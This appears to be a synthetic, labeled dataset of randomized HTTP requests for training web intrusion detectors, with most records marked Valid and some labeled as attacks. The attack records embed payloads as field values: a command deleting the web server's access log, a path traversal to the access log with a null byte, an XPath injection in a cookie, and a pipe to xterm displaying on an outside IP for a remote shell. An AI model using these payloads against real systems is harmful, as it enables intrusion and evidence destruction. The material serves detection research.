GET /d4.6XiqQcnx9Cu9/augteasiCrxmUh3d/w.58doTn976JXLPXNC2n/eCleW6lZ9eY8p_Wttr/ebeodfoExiRtronO0/Rg4sohpt/Dii/i3it9smzmylfi/pjoBKQ0hkhL/C20phqeuaoen0uj/-Xdrop.insertIdbKRBk.jpg?ifdainhiEnsS=ccszxlyhjt%3A%3Ahu9&5dqameclkot=0048264&hepl4vaenQ8let=t%3A+s+cwaton&J0WoZiM=8353267&sli=29504&htVteQwe8seaea=8970&w2eenens=o5w%27%5D++%7C+++P+++++%7C++++%2F%2Fuser%5B++++name%2Ftext%28+%29++++%3D+%27raEe&tMratutese=2fblteellateoeilc&mCdsts=0185860&XS3divAlM-E3C=es47ilo1hpsea4ssrs&3we=23&dqel6ae=xb5o HTTP/1.0
Host: 30.80.168.189
Connection: close
Accept: video/*, image/jpeg, application/zip;q=0.2
Accept-Charset: x-mac-arabic;q=0.5
Accept-Encoding: deflate;q=0.6, compress, identity;q=0.3
Accept-Language: a-oo;q=0.8, meey-n;q=0.0, hy-ebn0tee;q=0.4
Cache-Control: cb8bO='georngcm'
Client-ip: 149.222.22.125
Cookie: saedRr2a=076757287;n7tatbycIetninr=9135610851;YOi79YWfkxnull=mpnnaobomochaetgroup bye31
Cookie2: $Version="94"
Date: Sun, 03 Feb 08 04:58:02 GMT
ETag: "Y2G28OgdZeEhliz"
Expect: 100-continue
From: T5icshho@0Oledom8.gov
If-Modified-Since: Sat, 26 Nov 05 05:31:57 GMT
If-Unmodified-Since: Tue, 06 Jul 04 17:21:50 CET
If-Match: "gAzTgAbOGl8BwEygsuuQ"
If-None-Match: *
If-Range: Thu, 15 Apr 10 10:13:58 UTC
Max-Forwards: 311
MIME-Version: 6.5
Pragma: eild=oOcba
Proxy-Authorization: adwi etihc=5lIn4t
Authorization: NTLM ZWFyOWRhbXVsb2V1ZDBsckhmOHJocm5JcnJpc2F0ZVI0YlRu
Range: -042616,-147342
Referer: /uresxod/u61Ese/h8atiy/6ttCko.aspx
TE: trailers,trailers,trailers
Trailer: Connection
User-Agent: Mozilla/9.5 (X11; U; Open BSD i386 9.6; nl-To; rv:8.1.3) Gecko/95382895
UA-CPU: x86
UA-Disp: 8135,7731,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 161x6887
Via: 3.1 219.78.110.72, 6.7 www.an9t.png
Transfer-Encoding: cdai
Upgrade: Toa/4.1
Warning: 830 150.180.170.121 "g2fnareaRtt4gNB1gprl" 
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 8308712683150744327
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35749
Start - Id: 11334
class: Valid
GET /rknwHbJgfsb/feWESshutdownnF/WLLlikenrsOHq.mdb? HTTP/1.0
Host: www.2fmt2.st:80
Connection: tme8
Accept: text/*;q=0.7
Accept-Charset: x-mac-chinesetrad, isiri-3342, cp-932, x-mac-chinesetrad;q=0.4, iso-2022-jp;q=0.9
Accept-Encoding: compress, identity;q=0.7, identity;q=0.6
Accept-Language: 3ee9-t, hd9db-l, HpO-Ra3tei;q=0.1, nsslno-Cac;q=0.7
Cache-Control: min-fresh=7
Client-ip: 131.29.29.182
Cookie: -ZDE0VivFO7tmp=eaemshn;etluai;o3t8=ru eg1vhomescript;ueuov8o=5
Cookie2: $Version="8"
Date: Fri, 30 Jun 06 15:55:42 UTC
ETag: "qPpQy3DD3HOBJmaOY1"
Expect: tnrs=resh;eeatour=aTDhmbR
From: ctiZoauS@st4hnahd.ch
If-Modified-Since: Sat, 30 Jan 10 21:35:37 GMT
If-Unmodified-Since: Wed, 28 Jan 09 02:24:24 GMT
If-Match: "B0PxrLxO.nn@sYG"
If-None-Match: *
If-Range: Mon, 03 Apr 06 11:42:28 CET
Max-Forwards: 88
MIME-Version: 9.5
Pragma: lbe0r=edmntre
Proxy-Authorization: Digest opaque="ei6e3ho"
Authorization: Basic NHNseFA6ZXVlU2hvb2E=
Range: 9-,461-4858
Referer: http://1nlsbeIh.net/tzsst/ii3rOo/h4gr/m4ouub/hmoE.tiff
TE: trailers,gzip,deflate;q=0.2
Trailer: Proxy-Authorization
User-Agent: sT3T_H http://www.niotze.it
UA-CPU: x86
UA-Disp: 139,6791,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 953x845
Via: HTTP/9.7 126.133.228.108:87, 4.6 212.224.192.162
Transfer-Encoding: eoOddT; netshmt=9s5Uea
Upgrade: ax5/0.6
Warning: 653 42.106.86.222 "1e9IMojedeurettAw" 
X-Forwarded-For: 100.230.251.99
X-Serial-Number: 7492268797432274
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11334
Start - Id: 30472
class: Valid
GET /hgXadx@yTOnx/eDqq/rOCW-LyLdl6dlmQN/Iytfatcietlrhuenn/e_njA/feA0YE/oadm/eoce.mspx?lwib=exec&2ioh5ainapesn7j=868&ecg9nN4rocnenn=oU_&qX3PpHu=evalsd+&P4Iotju4dre=578059041&ut9S=hef%3AitarN%3Amboot.inii5&nriuEe2ki2=ntlibwhQy%3Ehtaccesnodenetcatt%3C&fcsuAwast7=ww6r0oPd&4eh=deletetirhwx%274ewfa&qxh8mstzsanst=copyde9&dduteb30ooodle=eye3reebshklE9aia&njpositioncreplaceCRxml=gtitl+linkge&q-mQXm8@m5ow=8958402&xtMiU=wzM&aerahjeErcl=e+ioin HTTP/1.0
Host: 105.226.19.128:80
Connection: close
Accept: text/xml;q=0.5, text/*, audio/*;q=0.4
Accept-Charset: x-mac-ce
Accept-Encoding: *
Accept-Language: s-sa;q=0.0, adteamo-u;q=0.0
Cache-Control: no-cache
Client-ip: 38.135.23.56
Cookie: i2ey3e=bho8eilgdtg@in;acilawArSnsT=32991;IaIeiooen=ejrebsoptk;audltgenzrdlr6=lesnw
Cookie2: $Version="618"
Date: Wed, 03 Mar 04 16:58:16 GMT
ETag: "rknMKkaMPOSoo_M-m"
Expect: raohtlln
From: eashaooo@aFOseet.de
If-Modified-Since: Fri, 05 Sep 08 15:49:26 CET
If-Unmodified-Since: Thu, 02 Apr 09 03:41:29 GMT
If-Match: *
If-None-Match: *
If-Range: "b1jN4YS3QnkP6nxK@7j"
Max-Forwards: 6
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: Basic cHRvMDA6ZHNhdG5j
Authorization: NTLM bWFlaWdld2FsZXRsbTl0ZnRudHVuc2FjZWllZGV0c0NzcmF6dGVh
Range: 91843-5,671-2
Referer: /tEkt/hssAog.gz
TE: gzip,deflate
Trailer: Authorization
User-Agent: kgthdensa (tNXMab@; c58i34K; kGiMZA; tpUQtFBn; nm46sioz)
UA-CPU: x86
UA-Disp: 264,406,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 710x3564
Via: FTP/7.3 www.odaste.shtml:0, 2.7 www.woyueit.js, HTTP/8.9 252.68.146.116
Transfer-Encoding: gzip
Upgrade: dksM/4.0, egtr/5.6, at1f/2.7, Ruilnr/5.9, epf4h3/8.8
Warning: 388 www.s8atby.tiff:2173 "etZioyh0oe" "Thu, 25 Sep 08 17:57:30 UTC"
X-Forwarded-For: 216.219.0.201
X-Serial-Number: 839589841918771
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30472
Start - Id: 43247
class: OsCommanding
GET /eW5NE_v/sj6uaZoKv/hSiB8eA2/tOkfkPpidaQ/swmr3e2/8trtfhFK/6Bteqfz0FKgmjZ/oWSuvR-pP.G-/l7ht5eA/teaht/ei7@m6zThOn/nkkA-.php4?2om1eetur=3&2JCADs=0cmh&aohhEoyet=eY%28ei%26dg&iqvLane9xtia0=e%28h1%26Cenesperlt%3Ana4w%26&SalC=nediv&hkyseinenudefe=n9Zt&Bat7F79Zk.cg=%250arm+++++-f+++++%2Fvar%2Flog%2Fhttpd%2Faccess_log+++++%3B&otebsRdTftg=tyu%406VN9&ap9=0B6Er&bhdua=eTujZMi&iuinl8ta2a=HR%40sphptlaye&EhyaGh=280466201 HTTP/1.0
Host: 242.178.88.46
Connection: rmesi
Accept: text/xml, audio/*;q=0.9, audio/*;q=0.3
Accept-Charset: utf-7, iso-8859-6;q=0.7, iso-8859-1;q=0.4, windows-1257;q=0.0, iso-8859-7
Accept-Encoding: *
Accept-Language: *
Cache-Control: o=att2aae
Client-ip: 92.41.242.45
Cookie: aLtcgj=l11Cm
Cookie2: $Version="89"
Date: Mon, 18 Jul 05 07:09:45 CET
ETag: W/"4OevjYPAXE2q_Wfy7"
Expect: h6244tu
From: w5itei@2re1ofAi.st
If-Modified-Since: Mon, 07 Mar 05 11:27:56 CET
If-Unmodified-Since: Sun, 13 May 07 19:29:37 UTC
If-Match: "jJJQ8_zWsQ9.n85fq.e"
If-None-Match: "KNpOLxGzqwDX@7YWDblS"
If-Range: Thu, 27 Mar 08 03:45:14 CET
Max-Forwards: 7196
MIME-Version: 9.7
Pragma: raoaa='aOAog'
Proxy-Authorization: Digest response="0B3cEb0aBbFc900Db7cC68fE50d55Ca6"
Authorization: Basic SnRiYTdjMHI6MmRnYWN0
Range: 6235-,3-
Referer: /cuemvH.cfm
TE: trailers,chunked;q=0.6,trailers
Trailer: If-None-Match
User-Agent: Mozilla/2.6 (X11; U; Open BSD i386 6.8; il-se; rv:3.0.7) Gecko/17427381
UA-CPU: 68000
UA-Disp: 9170,0027,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 115x099
Via: 1.2 53.236.183.191, HTTP/3.0 www.2eolHw8E.css, 9.4 www.dBeAutr.gif:71732
Transfer-Encoding: OuaE; cplrc0sl=fdohc
Upgrade: nedg/4.6, yodj/9.6
Warning: 865 www.tCxceo.shtml "dydtrSr7Wtth" "Fri, 09 Jul 04 12:15:54 GMT"
X-Forwarded-For: 228.91.246.96
X-Serial-Number: 855673274232810386
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43247
Start - Id: 19353
class: Valid
GET /0MUpassthrue/11pd0lxQOeL/xtermg/okehselee1exh/4UUzVc4br@S0zyliSBIp/ue6@XUUuhXve1.css?P2trkOmMkx=87833764&ila8ro=nrGlbr4N0i&0axAb9u0adiv=70936799 HTTP/1.0
Host: 158.49.118.162
Connection: close
Accept: */*;q=0.8
Accept-Charset: koi8;q=0.4, iso-8859-2, iso-8859-8-i;q=0.5
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.7
Cache-Control: min-fresh=4
Client-ip: 210.226.84.255
Cookie: Rieylohsu4i=6907;ce4hwuhinpEtkZ=02309;8hrzit=nkjHEZHZk;lanRev=EProO80
Cookie2: $Version="84"
Date: Wed, 29 Mar 06 22:10:50 GMT
ETag: W/"7Sx2WhrqLQQ@nr1t"
Expect: Rama
From: eNaay@rjRtebre.biz
If-Modified-Since: Wed, 04 Nov 09 11:01:27 CET
If-Unmodified-Since: Tue, 11 Mar 08 18:17:22 CET
If-Match: "3-ConxN4nJMhZoW"
If-None-Match: *
If-Range: "OvYwWwz1zhlsfLWEU8TU"
Max-Forwards: 39
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Basic bmZydGM6ZGVlYQ==
Authorization: Basic aG5pc2VTMzpsMW4wMHM=
Range: 80-
Referer: http://awBa.cz/ethsW/dTkhiEri/leaaLsd.gif
TE: trailers
Trailer: If-Match
User-Agent: N0fihoeSonxadeeltd
UA-CPU: StrongARM
UA-Disp: 812,7014,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 352x2255
Via: TdzroE/4.3 74.234.201.217, 2.5 www.ta2e.shtml, HTTP/7.5 141.241.158.188:58
Transfer-Encoding: ihyzlm
Upgrade: ma71z/4.6, eysee/5.2
Warning: 825 www.3Eothdos.gif:29220 "iow9t" 
X-Forwarded-For: 106.216.193.253
X-Serial-Number: 04731684394484360206
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 19353
Start - Id: 17682
class: Valid
GET /dd74htpassxterm2LxF/e7fbJwsb8K69hkG/bdvKzpcmWxMpQO/Lw/ciyerthATetFhee/Oeett8uFizig/e5i/5mtomne4amavlaailc/aULMop3NZ/drC_dbpKixrA/aOAO48ts8gdDdE/eQiwYs17.asmx?tydpD=iY5mT&qeai2n5tdeees=4 HTTP/1.1
Host: www.Hgdaxu.st
Connection: close
Accept: */*;q=0.3
Accept-Charset: macintosh, iso-8859-6, isiri-3342;q=0.9, x-mac-turkish;q=0.4
Accept-Encoding: 
Accept-Language: nfid-zun
Cache-Control: only-if-cached
Client-ip: 219.60.27.189
Cookie: tetp=390928;G_ZY_having_VmochaLT=a?ta\hwinntymn edaeadmina;hfnyrolhiaapEe=ftvopeehlawrLzsNon;u4hmaissie=2048;wfchw=uometatc;oayapltCe=672784494
Cookie2: $Version="9"
Date: Thu, 04 Jun 09 12:50:37 CET
ETag: "-ijoCDQLmVe67K4s1K1K"
Expect: adoelhJ9=ha5n;bu1yaaq5=otenea
From: ham2@rhhtcs.de
If-Modified-Since: Fri, 11 Aug 06 13:05:01 GMT
If-Unmodified-Since: Tue, 10 Apr 07 16:36:57 CET
If-Match: *
If-None-Match: "F.P6rXgUhLRUM8lY"
If-Range: Sat, 20 Oct 07 06:51:25 GMT
Max-Forwards: 05
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: ds5n eodzhhx=stpesdru
Authorization: Basic TjRhcmVieTowdDBuc3d1Nw==
Range: 0-,07-
Referer: http://www.iedfnrsH.fr/anOaftur.nsf
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/9.9 (compatible; 3reohoie; Unix; 3eeslnpn; i9cisat91d)
UA-CPU: Sparc
UA-Disp: 3353,591,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 5218x1595
Via: 8.9 www.sesonn.tiff, 8.1 105.58.89.29, 7.8 222.140.19.211
Transfer-Encoding: tteqe
Upgrade: 4rd/7.7, enhn/4.6, cfe/5.9
Warning: 607 www.ab3E5tss.png "3i5gweeoi8uw5re" 
X-Forwarded-For: 255.19.115.5
X-Serial-Number: 09480693646047521886
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17682
Start - Id: 10155
class: Valid
GET /ru1/8RQA3nwZ/iGrhesto2Dptedlz/Urmmcopyu/1JARNEFXHMor/ii1oum/ti9yfzthhmnhOdjem4r/ttpsltnChdt.msf?xtutplinnrayep=1&Ema=xai-L%40in&on=oUKeEXwH_Sm&sAlsorhcy=vasecetgm&8Fpasswdd.cadmin=Setnloqtibeu&emadmin0=13414&uoOau1xdib5tL=hae&ctO01m=ej0CeJmEdNF HTTP/1.1
Host: 207.204.69.107:80
Connection: keep-alive
Accept: audio/*;q=0.1
Accept-Charset: cp-932
Accept-Encoding: gzip;q=0.7, gzip;q=0.0, compress, compress;q=0.6, compress
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 128.232.71.123
Cookie: PToHKAZ7OyND=097003
Cookie2: $Version="9"
Date: Mon, 03 Nov 08 04:32:59 GMT
ETag: W/"CWRCG.AwZFSBB7Ep"
Expect: OElh4ec
From: ohLlh9sd@bflghwyl.cz
If-Modified-Since: Thu, 04 Jun 09 20:06:11 UTC
If-Unmodified-Since: Wed, 09 Mar 05 09:31:09 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 22 Mar 06 06:51:24 GMT
Max-Forwards: 1232
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: irimMo rnefpib=0rSnos
Authorization: Basic ZU5oemRFNGE6bm1scnA=
Range: 962502-,4-
Referer: http://17gqunb.it/udaz/rLtepAen/hmsgho/antnhvbw.sh
TE: chunked,trailers
Trailer: TE
User-Agent: Mozilla/8.0 (Windows; U; Win98 1.7; ee-tr; rv:5.7.6) Gecko/70857765
UA-CPU: x86
UA-Disp: 7262,260,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 103x309
Via: 4.5 193.55.6.63
Transfer-Encoding: compress
Upgrade: toiw/9.5, atmso/8.6, 3vnwf/5.8
Warning: 742 220.153.201.240 "EfoNtetSeersejlib2b" 
X-Forwarded-For: 73.178.177.84
X-Serial-Number: 87261
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 10155
Start - Id: 20300
class: Valid
GET /sx3nOcxB4nM@-DaWIh/temw/nh3vLds5ueoofoai/eTX/3HyfVVzqVC.0GP/wL1aUcczc/aYcoIcr4jz1-d50-VneF/Minput2NL6selectg_i/al9T.2m.Jsqmy0lv/hs3xL7u/eyZxhQwU4@dtd@.gif?an3ceoa8ua=%7Eaei&Orb1herewengei=lXJfNg&hDeohitisqP=dSinnrjnre6ida0&D7grGtw=b.lVzTxw&3crwd=vehtdh0y8Ys&heidreErfroN=cnd&hng=d%2BsinE%29tdBtg2&ys=15452486&ess8rp=rin&x7R13FctV.vS=tjWou6Ymavm&etreDOuh=cdcatnrelsoE HTTP/1.0
Host: 100.102.184.171:928
Connection: keep-alive
Accept: audio/basic
Accept-Charset: iso-8859-4, euc-jp;q=0.5
Accept-Encoding: 
Accept-Language: tue-ihtt7s, 7yynnr-slxt;q=0.0, 9tidh-xhhh, eTasj1s-a1ci2e, l3l-ntotyj;q=0.0
Cache-Control: min-fresh=22971
Client-ip: 235.128.217.246
Cookie: n2eattteLce=ra;jeiaas=334
Cookie2: $Version="178"
Date: Tue, 02 Dec 08 18:53:01 UTC
ETag: "L9zUADdYLkkD76fd"
Expect: tetn18re=iUidv
From: iejOssn@7qEdttaoe.st
If-Modified-Since: Tue, 30 Jan 07 18:46:38 UTC
If-Unmodified-Since: Thu, 02 Oct 08 19:32:16 GMT
If-Match: *
If-None-Match: *
If-Range: "j1ziL5EdvDwEjr1A2a"
Max-Forwards: 3691
MIME-Version: 5.4
Pragma: pnom6l='o'
Proxy-Authorization: Basic ZTI4bzplZXN0
Authorization: Digest username="velhSN0n"
Range: 8-31,-2,-9878
Referer: http://gyaeoco.be/khek/nggssnl/Ss6tsseo.swf
TE: trailers
Trailer: Transfer-Encoding
User-Agent: aOiisea/7.8.8
UA-CPU: PowerPC
UA-Disp: 2037,1915,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 0564x652
Via: 8.8 118.72.126.115, 4.3 224.99.164.170:8508
Transfer-Encoding: identity
Upgrade: eCc/4.2, tne/4.8, kdeqH/8.0
Warning: 569 www.tlhiuw.shtml "elwtdywe4Thero" 
X-Forwarded-For: 97.185.253.211
X-Serial-Number: 11361465282
----: -------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 20300
Start - Id: 46251
class: PathTransversal
GET /taowia/m521c5_OHt@PouRKv.5m/enclmh8tali4ii/4MNyaFuvi/iIA/sIw/euahrwt/enixNOwKxYutyulf9d/hiSl/dLuHo.aspx?fopoEn=ewxxg&9ra=eu%2BoRvbscript&entenEetegrl=0&wntp8Bl4soart=d+%28o&kqexecsock_streamDwnPoupdate1=st&pUmaltfoftn=ugobohh3inht&9nsek=Mewrlelt&6ans=96Hah&aIcp=xno&eseVtrv=o7ZUY-_tF_MS&ktS9Ew=..%2F..%2F..%2F..%2Fvar%2Flog%2Faccess_log%2500.html&Iodr=rsAd+ldAc&0MI6XKrbSHswp-=le%3A&hotoax0ore=eesthrap HTTP/1.0
Host: www.icslN4u.fr
Connection: close
Accept: audio/basic;q=0.4, audio/*;q=0.0
Accept-Charset: iso-8859-9
Accept-Encoding: 
Accept-Language: c91ea-vopj6szu;q=0.4, e-k4a;q=0.5, d-netner;q=0.4
Cache-Control: no-store
Client-ip: 65.148.210.30
Cookie: bDwD9y0=r ;R0stylehMj=6X;4gli=r7eo;88sqra=Yexeci;rih=ndscmeEHysIaoiT;AtealtmakC=8
Cookie2: $Version="22"
Date: Sun, 30 Dec 07 13:28:48 GMT
ETag: "N7Ppg6kTnN1vCFx0Lc"
Expect: salf=glfs9od
From: iervv@usohuics.gov
If-Modified-Since: Tue, 12 Apr 05 08:13:01 UTC
If-Unmodified-Since: Tue, 19 Apr 05 13:35:03 UTC
If-Match: "HLXMtC0SFhJ_0vM"
If-None-Match: *
If-Range: Sun, 22 Jul 07 03:13:40 GMT
Max-Forwards: 9
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: Digest uri=http://a8bl.ch/noetzkll/itbnanre/awsc.jsp
Authorization: Basic dG9tYzphaG52
Range: 5263-
Referer: /nlnktetb/ahEue8cn/tot2tbtn/7eswg/gEnsi.htm
TE: gzip
Trailer: If-Modified-Since
User-Agent: tToeeP
UA-CPU: 68000
UA-Disp: 2962,786,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 5939x660
Via: FTP/9.3 230.63.39.148, 7.0 97.126.93.175, FTP/3.9 www.o2ho.css:662
Transfer-Encoding: deflate
Upgrade: roeie/1.4
Warning: 233 www.yens9.gif "cesksyo" 
X-Forwarded-For: 196.41.114.153
X-Serial-Number: 52344762655816
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46251
Start - Id: 48407
class: XPathInjection
GET /ohOm/thhoeaneoeeai/sHYi/nmgxTUdropyZy/nE_gB/tnmxadseo5rcev/gos0daIa6ciahvheeqp.jpeg? HTTP/1.1
Host: www.oowsj.com
Connection: close
Accept: */*
Accept-Charset: iso-8859-8-i;q=0.3, ks_c_5601-1987, iso-8859-9;q=0.2, big5
Accept-Encoding: *;q=0.7
Accept-Language: wh13hst-t5cC7f7, s9adail-cH;q=0.7, t-1fu, phnkeb-u;q=0.7
Cache-Control: no-store
Client-ip: 48.39.243.174
Cookie: ebpstsein=536   or    count(path/child::node()[position()=((i+j+k+l+1)] |    path/child::*()[position()=(k+1)])=1 or 8726=
Cookie2: $Version="15"
Date: Sun, 15 May 05 06:12:26 UTC
ETag: "a5gsyRh4UsEu-2eFiQ"
Expect: bregeio
From: leYi@sarsGQ.cz
If-Modified-Since: Tue, 20 Oct 09 02:40:07 UTC
If-Unmodified-Since: Tue, 15 Apr 08 23:36:52 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 28 Feb 10 20:04:32 UTC
Max-Forwards: 5
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: tcbL weim=tswa
Authorization: Digest realm
Range: 421549-,-340,-90
Referer: /vnsae/hkeo/c3erltr.jpg
TE: trailers
Trailer: Connection
User-Agent: pctl8c3hrl/4.5.4
UA-CPU: x86
UA-Disp: 213,9851,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 2595x585
Via: 9.5 202.214.166.163, 6.4 42.117.228.127
Transfer-Encoding: compress
Upgrade: fix58d/0.9
Warning: 613 94.144.29.207 "amddibhttlecssaf" 
X-Forwarded-For: 124.106.76.10
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48407
Start - Id: 1910
class: Valid
GET /A4mneo3aco3er/m@ssNqqYe_/t2aeeidmdmubt/znMxqkOf/gQrxY/rGF1n9IDAl/lAArwtinEcxs/dU2n_6GM/u3lhtrmRT.cfm? HTTP/1.1
Host: 27.207.48.48
Connection: close
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 247.151.252.155
Cookie: eaac3sp=iM5Klisgnvjc;ih9hc=81715630;t8ttNo=46;5dlodvfAeefo=a5includeconnecteed3eaos;snb=fl8 ;aw7siMzdropMk=soNu
Cookie2: $Version="83"
Date: Sun, 31 Oct 04 23:34:33 UTC
ETag: "5akjY@04y3w7qYSzEYDR"
Expect: 100-continue
From: mehhr@Do8tsse.it
If-Modified-Since: Sat, 17 Jan 04 02:19:35 GMT
If-Unmodified-Since: Sun, 18 Feb 07 13:31:16 UTC
If-Match: "oYwT2Ue@@ivR4g0"
If-None-Match: "zpzuK6yrwNqHMXHo.J"
If-Range: Sun, 05 Sep 04 01:04:00 UTC
Max-Forwards: 552
MIME-Version: 3.7
Pragma: w2ld1lpr=EEe
Proxy-Authorization: Basic d0NpYjlsZTo2b2dxbnRl
Authorization: ngeMtn Rcelb1i=roemum
Range: 730007-,8569-0684
Referer: /f2tcwltt/hlja0/tedat.rar
TE: trailers
Trailer: Host
User-Agent: ueeenr6eh/8.0
UA-CPU: PowerPC
UA-Disp: 272,378,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 594x6031
Via: 4.1 www.d3if.shtml, 3.6 www.elNPEthR.gif:28840
Transfer-Encoding: identity
Upgrade: cUoNn/3.2
Warning: 102 www.hneEues.jpeg "btfhb" "Sun, 22 Feb 09 12:17:30 UTC"
X-Forwarded-For: 136.63.127.58
X-Serial-Number: 1247280154947
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1910
Start - Id: 43001
class: OsCommanding
PUT /gvKy3waT/m-lH/sha7cseue1stl/PKjipsam1ETK6S/OHdiesiPhszftuotnet/j89cko-LV5W/bB6xmlL4q_TF/ohroe7oceGmmxentcseE/o7etikzoxi1vea/d.HUEAOGPOlt0.msf? HTTP/1.1
Content-Length: 309
Content-Language: oodarevm,mdryen
Content-Encoding: deflate
Content-Location: http://www.6Moe.be/zizn2e/tna6/eetnlg/eS8po8n.msf
Content-MD5: T21lYWhzaWZlbmVlbnQ1RA==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Mon, 27 Mar 06 05:26:41 GMT
Host: 67.83.141.188:148
Connection: aet61en
Accept: application/postscript, application/zip, application/*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: Imn5bseo-3bemeeH, dyl-9nm;q=0.0, q-ienzbsu, dlnwDtt-ah;q=0.9
Cache-Control: no-store
Client-ip: 110.134.30.79
Cookie: Fs2GxyQ=unionlrElSftp rpsi7between;bZEaWZe8log=esSMc/nyo
Cookie2: $Version="366"
Date: Wed, 18 Jan 06 03:40:49 GMT
ETag: W/"EOvZtIdss-Rbcsa0"
Expect: 100-continue
From: 1lieg@acatdI.ch
If-Modified-Since: Sat, 14 Jun 08 06:09:34 GMT
If-Unmodified-Since: Tue, 25 Sep 07 20:15:46 CET
If-None-Match: *
If-Range: Mon, 21 Aug 06 18:01:25 CET
Max-Forwards: 2490
Pragma: I=e9
Authorization: Digest username="alvtna"
Referer: http://www.tblua5.st/nfetNj/iznc2/i3n2o/n2easno/lee7eir.jpeg
TE: deflate,deflate;q=0.1,deflate;q=0.3
Trailer: Proxy-Authorization
User-Agent: iWj@ZDK_O http://www.urawdett.com
UA-Pixels: 2695x320
Via: 4.5 246.6.12.40:3130, FTP/6.4 55.45.174.120, FTP/0.5 www.o8nos.jpeg
Transfer-Encoding: 1dynle; ehrnen=xcniebg
Upgrade: aiuiar/7.4, iBr3df/9.5, iirowo/9.3
Warning: 863 www.t8fst5.js:4942 "iaa8uceowT1aeejsueoy" "Mon, 03 Nov 08 04:48:51 UTC"
X-Forwarded-For: 225.212.15.105
----: -----------------------

lTtdjSsMv2=hdrope&4hsmsnOs=5&t9tet=4155793&hut=98&1iStqri1a=ttggzxs$null lezs&doEqioy=130&etxeB7rEetnEae=091453995&H7rbBpc=fromvIeval&GsIWlDQDmC=otaioFWnnhe&lndiAuh=otjr&iaymfs=|  /usr/openwin/bin/xterm+-display+194.239.26.23:0%00&ek=lihrinH&tshOnmekwh=0218093495&oAfhhborx=ooncecs zuee37e

End - Id: 43001
Start - Id: 5167
class: Valid
PUT /isear/rcpR6yY%u3TUUmrGk/uLjtH7m.w_RiZcbn/keeh5ehTedthlesaelum/nsnU/sLKFxBAeHz_7.js? HTTP/1.1
Content-Length: 45
Content-Language: ns,mmv
Content-Encoding: identity
Content-Location: http://www.13RtE4g.ch/ntaa/Te8itIb/tnocsa.mpeg
Content-MD5: ZXNudGhlYzZFaWF1ZnIzYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 03 Aug 06 11:54:23 CET
Last-Modified: Thu, 18 Sep 08 08:24:11 UTC
Host: 38.166.8.174
Connection: ia9rat
Accept: text/html, text/xml
Accept-Charset: ks_c_5601-1987;q=0.4, iso-10646-ucs-2;q=0.8, x-mac-hebrew;q=0.3, utf-8
Accept-Encoding: deflate;q=0.9, gzip;q=0.6
Accept-Language: k-if, 1agm-iiithpd;q=0.5, oocad-m
Cache-Control: joIoE='v2neWa9'
Client-ip: 73.76.159.247
Cookie: ee=ablpemeejnneri;ohdg=7b;hh=164;ea=437845012
Cookie2: $Version="249"
Date: Sun, 29 Feb 04 23:35:09 CET
ETag: W/"yyvxIosvhKi7Qigv"
Expect: 100-continue
From: ehsAelee@StuNsq.it
If-Modified-Since: Sat, 08 May 04 05:08:19 UTC
If-Unmodified-Since: Mon, 27 Apr 09 10:55:26 UTC
If-Match: "34He-EJj.5BLf7s3h8P"
If-None-Match: "wnq2s4bsFZKuvO1"
If-Range: "yXGBHHN3JzForI5"
Max-Forwards: 097
MIME-Version: 3.5
Pragma: ewab=4HmnhwOl
Proxy-Authorization: Digest uri=http://www.cmgaej.gov/eCna/cIiprpee/gnrena/not5ts.swf
Authorization: vhRa uhTS=vEthr
Range: 933-2,0501-
Referer: http://a1tl3.cz/eceie39e/dumo2.txt
TE: deflate;q=0.7,trailers,trailers
Trailer: Connection
User-Agent: H7wexsr0/8.8.4
UA-CPU: x86
UA-Disp: 279,387,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 938x1515
Via: FTP/0.1 www.lEftaet2.shtml, FTP/0.1 116.253.154.114
Transfer-Encoding: identity
Upgrade: snfH3E/4.0
Warning: 340 www.enzW.gif "w3mBIw" 
